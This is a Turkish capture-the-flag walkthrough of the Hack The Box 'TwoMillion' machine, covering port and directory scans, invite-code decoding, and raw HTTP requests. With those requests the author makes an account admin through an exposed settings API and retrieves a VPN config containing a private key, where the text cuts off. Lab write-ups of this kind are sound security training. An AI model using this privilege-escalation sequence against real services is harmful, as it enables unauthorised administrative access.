İçeriğe geç

TwoMillion

Makine Adı Seviye OS Logo
TwoMillion - HTB Kolay Linux

Walkthrough

nmap taraması ile başlayalım.


┌──(root㉿kali)-[/tmp/10.10.11.221/nmapAutomator_Results/nmap]
└─# cat Vulns_10.10.11.221.nmap 
WARNING: Duplicate port number(s) specified.  Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm).
# Nmap 7.93 scan initiated Sat Aug  5 08:38:08 2023 as: /usr/bin/nmap -sV --script vuln -p22,80,22,80 --open -oN nmap/Vulns_10.10.11.221.nmap --system-dns --stats-every 3s 10.10.11.221
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2010-0738: 
|_  /jmx-console/: Authentication was not required
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug  5 08:51:41 2023 -- 1 IP address (1 host up) scanned in 812.93 seconds

/etc/hosts içerisined gerekli değişiklikleri yaptıktan sonra sayfada inceleme yapmaya bşaladım ve HTB'sın ilk girişinde alınan davetiye koduna benzer bir senaryo var sanırım ancak HTB'a giriş yapalı çok olduğu için yöntemi hatırlmaıyordum bunun üzerine sıfırdan kendim bulmayı denedim.

İnternet safyası üzerinde çeşitli incelemeler yaptım:

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# gobuster dir -u http://2million.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -r --exclude-length 1674
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://2million.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          1674
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/08/05 08:36:19 Starting gobuster in directory enumeration mode
===============================================================
/login                (Status: 200) [Size: 3704]
/register             (Status: 200) [Size: 4527]
/images               (Status: 403) [Size: 146]
/home                 (Status: 200) [Size: 64952]
/assets               (Status: 403) [Size: 146]
/css                  (Status: 403) [Size: 146]
/js                   (Status: 403) [Size: 146]
/api                  (Status: 401) [Size: 0]
/logout               (Status: 200) [Size: 64952]
/fonts                (Status: 403) [Size: 146]
/views                (Status: 200) [Size: 64952]
/VPN                  (Status: 403) [Size: 146]
/invite               (Status: 200) [Size: 3859]
/controllers          (Status: 403) [Size: 146]
Progress: 220560 / 220561 (100.00%)
===============================================================
2023/08/05 09:29:35 Finished
===============================================================

Yukardaki resime baktığımızda obfuscate edilmiş bir JS görüyoruz. Bu kodu deobfuscate ettiğimde aşağıdaki gibi bir sonuçla karşılaştım.

Yukarıdkai koddan davetiye kodumuzu nereden alacağımızı anlayabiliyoruz.

ROT 13 ile şifrelenmiş, çözdüğümüzde aşağıdaki sonucu elde ettim.

Bunun üzerne burp ile istek oluşturup davetiye kodumu aldım ve hesap oluşturdum.

Aşağıda base64 ile gelen kodu decode eilmiş hali görülmektedir.

RThSMVotUkNFQTQtVkxLVUgtUFBMM1E=
E8R1Z-RCEA4-VLKUH-PPL3Q

Daha önceden yapmış lduğum dosya dizin taraması işlemini bu sefer tekrarladım ama giriş yaptıktan sonraki cookie değerimle. en baştan başadlığımda normalde dönüş değeri 0 byte olarak gelen veriler bu sefer daha farklı geldi.

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# gobuster dir -u http://2million.htb/api/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -r --exclude-length 1674 -c "PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4"
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://2million.htb/api/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          1674
[+] Cookies:                 PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/08/05 12:10:06 Starting gobuster in directory enumeration mode
===============================================================
/v1                   (Status: 200) [Size: 800]

Bu istekten gelen cevabı bir dosyaya kaydettiğimde ve daha sonrasında jq aracı ile beauty hale getirdiğimde aşağıdaki sonuçları aldım. Burada api'lerin doc'u bulunmaktadır.

┌──(root㉿kali)-[/tmp/10.10.11.221]
    └─# cat v1 | jq
    ,{
      "v1": {
        "user": {
          "GET": {
            "/api/v1": "Route List",
            "/api/v1/invite/how/to/generate": "Instructions on invite code generation",
            "/api/v1/invite/generate": "Generate invite code",
            "/api/v1/invite/verify": "Verify invite code",
            "/api/v1/user/auth": "Check if user is authenticated",
            "/api/v1/user/vpn/generate": "Generate a new VPN configuration",
            "/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
            "/api/v1/user/vpn/download": "Download OVPN file"
          },
          "POST": {
            "/api/v1/user/register": "Register a new user",
            "/api/v1/user/login": "Login with existing user"
          }
        },
        "admin": {
          "GET": {
            "/api/v1/admin/auth": "Check if user is admin"
          },
          "POST": {
            "/api/v1/admin/vpn/generate": "Generate VPN for specific user"
          },
          "PUT": {
            "/api/v1/admin/settings/update": "Update user settings"
          }
        }
      }
    }

Bu istekler aracılığı ile yaptıklarımı kısaca açıklayyaim. ilk olarak admin miyim değilmiyim diye "/api/v1/admin/auth" apisine istek attığımıda olmadığımı gördüm daha sonrasında "/api/v1/admin/settings/update" apisi ile kendimi admin yapmayı denedim. Bu süreç çeşitli deneme yanılma ve sunucudan gelen cevaplar doğrultusunda işlemlerle oldu.

İşte sırasıyla isteklerim ve cevaplarım:

GET /api/v1/admin/auth HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:22:45 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 17

{"message":false}
PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

Content-Length: 0

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:28:12 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 53

{"status":"danger","message":"Invalid content type."}
PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

Content-Length: 0

Content-Type: application/json

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:28:28 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 56

{"status":"danger","message":"Missing parameter: email"}
PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

Content-Length: 27

Content-Type: application/json

{"email":"[email protected]"}

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:29:08 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 59

{"status":"danger","message":"Missing parameter: is_admin"}
PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

Content-Length: 43

Content-Type: application/json

{"email":"[email protected]",

    "is_admin":1}

    HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:29:37 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 41

{"id":14,"username":"admin","is_admin":1}
GET /api/v1/admin/auth HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:30:31 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 16

{"message":true}
POST /api/v1/admin/vpn/generate HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

Content-Length: 0

Content-Type: application/json

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:32:00 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 59

{"status":"danger","message":"Missing parameter: username"}
POST /api/v1/admin/vpn/generate HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4

Connection: close

Content-Length: 0

Content-Type: application/json

{"username":"admin"}

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 05 Aug 2023 16:32:21 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 10824

client
dev tun
proto udp
remote edge-eu-free-1.2million.htb 1337
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
verb 3
data-ciphers-fallback AES-128-CBC
data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
tls-cipher "DEFAULT:@SECLEVEL=0"
auth SHA256
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
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
2iX/ag==
-----END CERTIFICATE-----
</ca>
<cert>
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 2 (0x2)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=UK, ST=London, L=London, O=HackTheBox, OU=VPN, CN=2million/[email protected]
        Validity
            Not Before: Aug  5 16:32:21 2023 GMT
            Not After : Aug  4 16:32:21 2024 GMT
        Subject: C=GB, ST=London, L=London, O=admin, CN=admin
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:be:6b:fd:3c:a2:6f:bc:a1:2c:09:a7:f8:91:48:
                    b7:5f:ae:c6:b1:bc:4e:1b:0c:d0:5b:a9:15:1c:ee:
                    12:81:cc:65:71:3a:a9:b4:c5:84:04:e7:3d:c8:f5:
                    b5:f0:37:91:2d:f1:3e:2a:a7:ae:58:ec:15:d0:35:
                    35:b9:9c:19:03:d9:71:d7:06:84:f0:fd:eb:f8:a5:
                    85:6e:20:c8:28:d7:d4:b4:ca:ac:c9:f3:a4:50:da:
                    56:dc:1a:74:d2:6a:dd:86:fc:00:1b:2c:05:a9:11:
                    36:1b:ab:d1:aa:5f:e3:de:38:87:b0:6f:a5:c0:74:
                    99:cd:de:cd:a5:c6:9c:68:56:95:30:70:09:84:66:
                    ad:27:57:2d:f2:b6:85:bd:48:68:18:03:bf:59:41:
                    71:9f:bc:7f:28:1b:7c:9d:90:6a:96:25:b7:15:d2:
                    b1:1f:c4:44:29:c5:45:c7:c2:7a:30:86:4f:d8:de:
                    5c:51:9a:38:01:0a:9a:61:89:a0:eb:b7:dd:7f:54:
                    7a:ed:13:e6:01:03:fd:e4:37:09:16:54:20:68:ba:
                    e2:e0:ef:5d:8d:77:53:5c:e6:b7:7c:e8:6d:82:0d:
                    83:8a:8f:c8:5a:9a:a6:c9:14:af:d3:ce:78:c0:fb:
                    75:3c:fc:36:4a:2e:d6:53:61:75:d4:9a:1c:4f:f7:
                    3f:e1
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                C2:46:2C:78:9B:49:D6:44:CF:C4:91:29:B5:41:80:22:BE:61:9F:9B
            X509v3 Authority Key Identifier: 
                7A:62:DD:1D:B6:FE:4A:C8:E3:F8:9F:FA:AC:F4:15:0C:96:BA:2E:91
            X509v3 Basic Constraints: 
                CA:FALSE
            X509v3 Key Usage: 
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
            Netscape Comment: 
                OpenSSL Generated Certificate
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        1a:75:f9:7d:f3:67:12:83:90:10:72:39:64:64:7d:60:8d:36:
        b8:f4:30:3f:36:cc:aa:2b:78:db:98:fb:2d:ca:0b:fc:f8:26:
        e4:21:dd:9f:b1:1f:ca:a2:58:12:71:93:09:e3:70:a1:30:c1:
        82:66:0e:1a:79:8d:84:ac:88:47:72:ce:47:ca:c4:3c:03:3c:
        87:73:1f:d0:75:81:bb:f7:a3:3f:dd:26:20:4b:98:52:ea:0e:
        0d:1b:d4:0c:ee:05:ea:ce:f0:28:21:6c:80:1e:bb:3b:a4:16:
        d9:0d:13:42:e2:97:fc:ac:6f:aa:b9:b9:ba:1d:15:18:26:26:
        d3:5e:96:70:00:8a:16:34:45:41:cf:c3:be:3c:4a:c1:14:cd:
        1b:10:8c:a3:53:43:6a:bd:3b:90:27:de:7b:7a:2a:be:23:3c:
        80:5b:e1:4e:9a:3f:2a:59:b5:9b:5a:34:8a:ba:ef:a0:6f:9d:
        39:12:ee:b3:44:4c:f0:00:93:ef:fd:e4:02:bc:10:31:3f:f8:
        a5:10:ba:81:e5:4e:16:c9:65:e1:29:77:1a:65:81:4b:4d:bf:
        56:31:2c:72:1e:44:22:03:8c:32:12:62:93:d0:9a:63:f0:fa:
        c6:74:13:70:fe:22:63:ab:98:33:25:6b:1a:e3:d2:a8:cd:66:
        9d:3d:32:16:98:92:6e:c6:e2:d9:71:32:54:4c:8c:03:c2:46:
        34:84:81:e5:59:aa:4b:1f:3c:71:4e:f7:2e:e1:29:85:7e:d0:
        9c:76:0e:ac:65:8c:17:a5:33:a1:05:97:5f:90:35:76:ce:00:
        df:90:18:ff:83:52:62:15:d2:23:3d:87:50:8f:0f:45:f1:8d:
        b2:67:bf:8c:42:91:c4:f3:32:3f:95:db:76:97:6a:24:a7:e4:
        7d:84:4d:37:58:e4:da:88:ab:7c:d9:e3:95:62:2f:0c:57:2e:
        4b:52:77:ae:59:5c:f9:63:74:96:e3:60:3d:2c:b3:fd:d1:42:
        d4:46:1f:63:8b:27:8d:01:df:c8:14:7a:8a:18:9d:77:9d:2e:
        21:97:2f:3b:b9:5c:5b:c9:89:ce:b5:c5:65:7c:cb:00:e1:62:
        47:50:ea:ea:d4:64:6c:04:ac:c1:20:a2:d9:f6:6f:a1:11:26:
        a8:88:15:cf:85:de:a1:ee:4b:ca:e9:f6:38:bc:dc:13:5f:08:
        dc:00:5d:ed:b8:f7:d7:7e:57:52:2a:31:67:fb:6c:44:33:4e:
        07:48:32:07:d4:80:76:1a:bf:b7:d8:5d:81:1c:e3:e8:96:7d:
        df:38:be:41:d2:5d:39:ea:0e:8b:b8:0c:14:c6:7b:93:01:a5:
        e2:2d:ca:c8:d7:39:7f:02
-----BEGIN CERTIFICATE-----
MIIE3TCCAsWgAwIBAgIBAjANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVUsx
DzANBgNVBAgMBkxvbmRvbjEPMA0GA1UEBwwGTG9uZG9uMRMwEQYDVQQKDApIYWNr
VGhlQm94MQwwCgYDVQQLDANWUE4xETAPBgNVBAMMCDJtaWxsaW9uMSEwHwYJKoZI
hvcNAQkBFhJpbmZvQGhhY2t0aGVib3guZXUwHhcNMjMwODA1MTYzMjIxWhcNMjQw
ODA0MTYzMjIxWjBPMQswCQYDVQQGEwJHQjEPMA0GA1UECAwGTG9uZG9uMQ8wDQYD
VQQHDAZMb25kb24xDjAMBgNVBAoMBWFkbWluMQ4wDAYDVQQDDAVhZG1pbjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL5r/Tyib7yhLAmn+JFIt1+uxrG8
ThsM0FupFRzuEoHMZXE6qbTFhATnPcj1tfA3kS3xPiqnrljsFdA1NbmcGQPZcdcG
hPD96/ilhW4gyCjX1LTKrMnzpFDaVtwadNJq3Yb8ABssBakRNhur0apf4944h7Bv
pcB0mc3ezaXGnGhWlTBwCYRmrSdXLfK2hb1IaBgDv1lBcZ+8fygbfJ2QapYltxXS
sR/ERCnFRcfCejCGT9jeXFGaOAEKmmGJoOu33X9Ueu0T5gED/eQ3CRZUIGi64uDv
XY13U1zmt3zobYINg4qPyFqapskUr9POeMD7dTz8Nkou1lNhddSaHE/3P+ECAwEA
AaOBiTCBhjAdBgNVHQ4EFgQUwkYseJtJ1kTPxJEptUGAIr5hn5swHwYDVR0jBBgw
FoAUemLdHbb+Ssjj+J/6rPQVDJa6LpEwCQYDVR0TBAIwADALBgNVHQ8EBAMCAf4w
LAYJYIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMA0G
CSqGSIb3DQEBCwUAA4ICAQAadfl982cSg5AQcjlkZH1gjTa49DA/NsyqK3jbmPst
ygv8+CbkId2fsR/KolgScZMJ43ChMMGCZg4aeY2ErIhHcs5HysQ8AzyHcx/QdYG7
96M/3SYgS5hS6g4NG9QM7gXqzvAoIWyAHrs7pBbZDRNC4pf8rG+qubm6HRUYJibT
XpZwAIoWNEVBz8O+PErBFM0bEIyjU0NqvTuQJ957eiq+IzyAW+FOmj8qWbWbWjSK
uu+gb505Eu6zREzwAJPv/eQCvBAxP/ilELqB5U4WyWXhKXcaZYFLTb9WMSxyHkQi
A4wyEmKT0Jpj8PrGdBNw/iJjq5gzJWsa49KozWadPTIWmJJuxuLZcTJUTIwDwkY0
hIHlWapLHzxxTvcu4SmFftCcdg6sZYwXpTOhBZdfkDV2zgDfkBj/g1JiFdIjPYdQ
jw9F8Y2yZ7+MQpHE8zI/ldt2l2okp+R9hE03WOTaiKt82eOVYi8MVy5LUneuWVz5
Y3SW42A9LLP90ULURh9jiyeNAd/IFHqKGJ13nS4hly87uVxbyYnOtcVlfMsA4WJH
UOrq1GRsBKzBIKLZ9m+hESaoiBXPhd6h7kvK6fY4vNwTXwjcAF3tuPfXfldSKjFn
+2xEM04HSDIH1IB2Gr+32F2BHOPoln3fOL5B0l056g6LuAwUxnuTAaXiLcrI1zl/
Ag==
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC+a/08om+8oSwJ
p/iRSLdfrsaxvE4bDNBbqRUc7hKBzGVxOqm0xYQE5z3I9bXwN5Et8T4qp65Y7BXQ
NTW5nBkD2XHXBoTw/ev4pYVuIMgo19S0yqzJ86RQ2lbcGnTSat2G/AAbLAWpETYb
q9GqX+PeOIewb6XAdJnN3s2lxpxoVpUwcAmEZq0nVy3ytoW9SGgYA79ZQXGfvH8o
G3ydkGqWJbcV0rEfxEQpxUXHwnowhk/Y3lxRmjgBCpphiaDrt91/VHrtE+YBA/3k
NwkWVCBouuLg712Nd1Nc5rd86G2CDYOKj8hamqbJFK/TznjA+3U8/DZKLtZTYXXU
mhxP9z/hAgMBAAECggEAAovAomo+r6M5IrmKKcVa1giw9XKxycPb/+s6tgDm+oE5
TpxW5TTONidyMo76MVeZWVeeNeFZO+0vYRnahaBdH2GFh5cpwSv4bwoFvsRJf84L
rQWADhjLysTSDCoeg2sQSloRfWuDKXyaZFAhrucufYfEhOjnurMWZLe2uLmHKSAQ
EV52E/aiQt9nyBn5KUXVknl/7FSAZYGsMF0rdDR/Zbn0tBQPEvUh1melZZVixPCV
U3W/EI8SNHdx1APCJXMhNMQ78p4Hcwlc85/dny0oR0HRniJQ8WaoizeMU+aT0gjh
niYvQ+WBGYhfkQrV4SPSTCb73Q4VLwtV/mfwTiPJQQKBgQDjJqzDuj+auLwfP4cx
Iwl7PdTfAuNPTWM+DnW9oWIniIK5ZRn2TmTFwOVTpEDz3dMnsoYslijKt1S5anBh
59q8i0kSMlPKwysfJwg6mYOUUqE6U+9Sceh/0qmiTCe1AYtltPo38+8ePEgcqvUK
iXbEc8loLkg/cAztYh/kco3GwQKBgQDWmySD1Sy7ILRNhb4j8vuivnYVsq+w+k4F
m0zaedpczs814q2Z6suEf25XugG8kg0hN2yRHcyF/gFai4CECsSIQS8uqy5hCA1o
iOJMD3H/5ACM8iUZL9DDFl5XBknyLkvbcwSoQK7W8JAas/BqarKt2ouzX6vUwysI
1mrauUHhIQKBgG5gzrbVfC7M8e0lS6Ze5i6S3yv3FUnlywHOuPwKvc2EEjHQpQsB
EQrfLxCz0jQuaHrzzys/VFcdOvhWdoG8zper/zfuaLUwnXWn2+HN0xhyBpJ3UuX3
IAls7q1E4E6ej4Q+qxAhYuKIXGpB0IzsO2A++3G6e7UH1+BKPEEgQTCBAoGAYj2Z
JKSEmpEpGMfdt/U2jlSkF+C5nsmmx9hFAUqA1LVzk9ZV5Dzgt6HiMFSdEObHDeqi
T3gVtU0G750m0stfFoTIhZOlYpPeF3l6Jpl3dU25lswOgY4rAfOOckYVucDJxwbL
Hf6mSwzK2v5+UyjO7Nk71Hw6W+aQH7aQKdpetyECgYEAiQ/haDASENBOPfmFE0YX
QcJcKkDm01T2qfv9FoShFJxBrLwgttPhPtPVdHlMt1BGAVwreAUE2H5SKFUxEbV6
